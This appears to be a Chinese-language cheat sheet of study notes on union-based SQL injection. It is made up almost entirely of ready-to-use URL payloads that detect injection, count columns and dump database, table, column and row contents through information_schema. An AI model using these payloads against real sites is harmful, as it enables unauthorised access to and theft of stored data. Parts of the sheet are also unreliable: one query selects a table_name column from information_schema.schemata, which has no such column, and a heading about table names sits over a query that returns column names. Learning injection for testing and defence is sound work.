SQL注入_2025

数字型 or 字符型?

数字型:

  1. url?xxx.php?id=1 and 1=1,页面显示正常
  2. url?xxx.php?id=1 and 1=2,页面报错,说明存在数字型注入。

字符型:

  1. url?xxx.php?id=1' and '1'='1,页面正常
  2. url?xxx.php?id=1' and '1'='2,页面报错,说明存在字符型注入。

判断列数

  1. id=1’ order by 4--+报错
  2. id=1' order by 3--+页面无报错,说明存在3列。

爆出数据库

  1. ?id=-1' union select 1,database(),3--+
  2. ?id=-1' union select 1,group_concat(table_name),3 from information_schema.schemata--+

爆出数据表

  1. ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='数据库'--+

爆表名

  1. ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='数据表'#

爆表中信息

  1. ?id=-1' union select 1,group_concat(0x7e,字段,0x7e),3 from 数据库名.数据表名--+